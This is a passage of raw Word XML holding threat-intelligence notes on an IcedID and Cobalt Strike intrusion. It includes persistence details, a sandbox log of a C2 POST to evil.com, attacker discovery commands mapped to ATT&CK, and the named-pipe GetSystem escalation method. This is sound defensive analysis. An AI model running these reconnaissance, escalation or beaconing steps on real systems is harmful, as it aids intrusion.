          </w:rPr>
          <w:t>IcedID</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (Malware Family) (fraunhofer.de)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01749334" w14:textId="0BF914AD" w:rsidR="00A250C7" w:rsidRDefault="009742ED" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId202" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>IcedID</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0483 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D9AEF43" w14:textId="6BD9C2F1" w:rsidR="00A250C7" w:rsidRDefault="00A250C7" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C187D15" w14:textId="01F00E7D" w:rsidR="00A250C7" w:rsidRPr="00A250C7" w:rsidRDefault="00A250C7" w:rsidP="00DD1FAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A250C7">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Understanding named pipe impersonation approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85EB78" w14:textId="71688D0D" w:rsidR="007B3C24" w:rsidRDefault="00A250C7" w:rsidP="00DD1FAC">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId203" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Hunting for </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GetSystem</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> commands in offensive security tools (redcanary.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52F81C0B" w14:textId="7CFB8F61" w:rsidR="00A250C7" w:rsidRDefault="00A250C7" w:rsidP="00A250C7">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We have here Technique 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Technique 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a named pipe from Meterpreter. It also </w:t>
      </w:r>
      <w:hyperlink r:id="rId204" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="004442"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>creates and runs a service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> that runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cmd.exe /c echo “some data” &gt;\\.\pipe\[random pipe here]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. When the spawned cmd.exe connects to Meterpreter’s named pipe, Meterpreter has the opportunity to impersonate that security context. </w:t>
      </w:r>
      <w:hyperlink r:id="rId205" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="004442"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Impersonation of clients</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a named pipes feature. The context of the service is SYSTEM, so when you impersonate it, you become SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA1E53" w14:textId="6AABFFEC" w:rsidR="00A250C7" w:rsidRDefault="00A250C7" w:rsidP="00DD1FAC">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId206" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">What happens when I type </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>getsystem</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>? | Cobalt Strike</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E8FFA1C" w14:textId="77777777" w:rsidR="00A250C7" w:rsidRDefault="00A250C7" w:rsidP="00DD1FAC"/>
    <w:p w14:paraId="5626CAF3" w14:textId="059EDA7E" w:rsidR="007B3C24" w:rsidRDefault="007B3C24" w:rsidP="00DD1FAC">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3C24">
        <w:t xml:space="preserve">We assess with moderate confidence that the initial vector used by the threat actor was a zip file, which included a malicious JavaScript file, delivered through a phishing campaign. The JavaScript file would eventually download and execute the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3C24">
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3C24">
        <w:t xml:space="preserve"> malware. Discovered in 2017, what started as a commodity malware is now currently being deployed as an initial access broker by ransomware threat actors.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A30D410" w14:textId="3ECFB21D" w:rsidR="00E25B10" w:rsidRDefault="00E25B10" w:rsidP="00DD1FAC">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E25B10">
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E25B10">
        <w:t xml:space="preserve"> was executed via rundll32.exe and ran command and control over port 443 for the duration of the intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345390A9" w14:textId="1640ECCF" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00DD1FAC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[2] For </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EDCA657" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>It sets up persistence by creating a Scheduled Task with the following characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E632B7" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* Name: Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573491E3" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* Trigger: At Log on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD9187" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* Action: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LocalAppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%\$Example\\waroupada.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67549646" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* Conditions: Stop if the computer ceases to be idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315D80B" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* The sub-directory within %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LocalAppdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%, Appears to be randomly picked from the list of directories within %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProgramFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%. This needs more verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680DE4F3" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* The filename remained static during analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78153F00" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621EE573" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* If “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” is not passed as an argument, it sets up persistence and waits for reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56554FC2" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E19D4B" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C1B96" w14:textId="77777777" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>rundll32.exe kernel</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>32,Sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9762C" w14:textId="129A4505" w:rsidR="00120A43" w:rsidRDefault="00120A43" w:rsidP="00120A43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>* Setup a local listener to proxy traffic on 127.0.0.1:50000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6723D8" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267295C" w14:textId="3E5509D6" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA814B" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: POST /forum/posting.php?a=0&amp;b=4FC0302F4C59D8CDB8&amp;d=0&amp;e=63&amp;f=0&amp;g=0&amp;h=0&amp;r=0&amp;i=266390&amp;j=11 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EF00A" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB88A6" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76761A0C" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Content-Length: 196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD24515" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Host: evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB100E2" w14:textId="77777777" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: &lt;(POSTDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43569693" w14:textId="6D7BB82A" w:rsidR="00543758" w:rsidRDefault="00543758" w:rsidP="00543758">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2E6E3" w14:textId="5392FB55" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F83851">
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F83851">
        <w:t xml:space="preserve"> ran initial discovery after being executed on the beachhead. Various commands were executed to gather more information about the compromised environment; including the currently logged on user, domain trusts, groups, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F83851">
        <w:t>etc .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00392685" w14:textId="3BFAF328" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>ipconfig /all</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1016 System Network Configuration Discovery</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8779FC" w14:textId="40849BE3" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1082 System Information Discovery</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F7ED6" w14:textId="76A22F3D" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /groups</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve">(  </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1033 System Owner/User Discovery</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759181C6" w14:textId="42DA62E0" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">net config </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">workstation  </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve">see T1016) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2C854F" w14:textId="47A558C5" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1482 Domain Trust Discovery</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903159E" w14:textId="3CD9F1D1" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>all_trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> (  see above )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16613A26" w14:textId="47AB9B90" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>net view /all /domain</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001F5CC8" w:rsidRPr="001F5CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1135 Network Share Discovery</w:t>
      </w:r>
      <w:r w:rsidR="001F5CC8">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C0C51E" w14:textId="3340B05D" w:rsidR="00F83851" w:rsidRDefault="00F83851" w:rsidP="00F83851">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>net view /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BAB547" w14:textId="74C1D81A" w:rsidR="00EF76CF" w:rsidRDefault="00EF76CF" w:rsidP="00EF76CF">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF76CF">
        <w:t xml:space="preserve">While there was some initial discovery activity from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF76CF">
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF76CF">
        <w:t xml:space="preserve"> malware, it went quiet, just beaconing to command and control but not performing any other activity. After being dormant for over two days, a Cobalt Strike Beacon was dropped and executed on the system infected with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF76CF">
        <w:t>IcedID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF76CF">
        <w:t>. The threat actors then ran another round of discovery activity with native windows utilities such as nltest.exe, whoami.exe, and net.exe. They then successfully escalated to SYSTEM privileges via Cobalt Strike’s built-in “named pipe impersonation” (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF76CF">
        <w:t>GetSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF76CF">
        <w:t xml:space="preserve">) functionality.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748782A7" w14:textId="77777777" w:rsidR="00001886" w:rsidRDefault="00001886" w:rsidP="00EF76CF">
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C5003" w14:textId="5A394FC6" w:rsidR="00001886" w:rsidRDefault="00001886" w:rsidP="00EF76CF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A848E" w14:textId="445B8B93" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00EF76CF">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00907167">
        <w:t>Additional discovery commands were executed by Cobalt Strike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE4A9B4" w14:textId="77777777" w:rsidR="00907167" w:rsidRDefault="00907167" w:rsidP="00907167">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
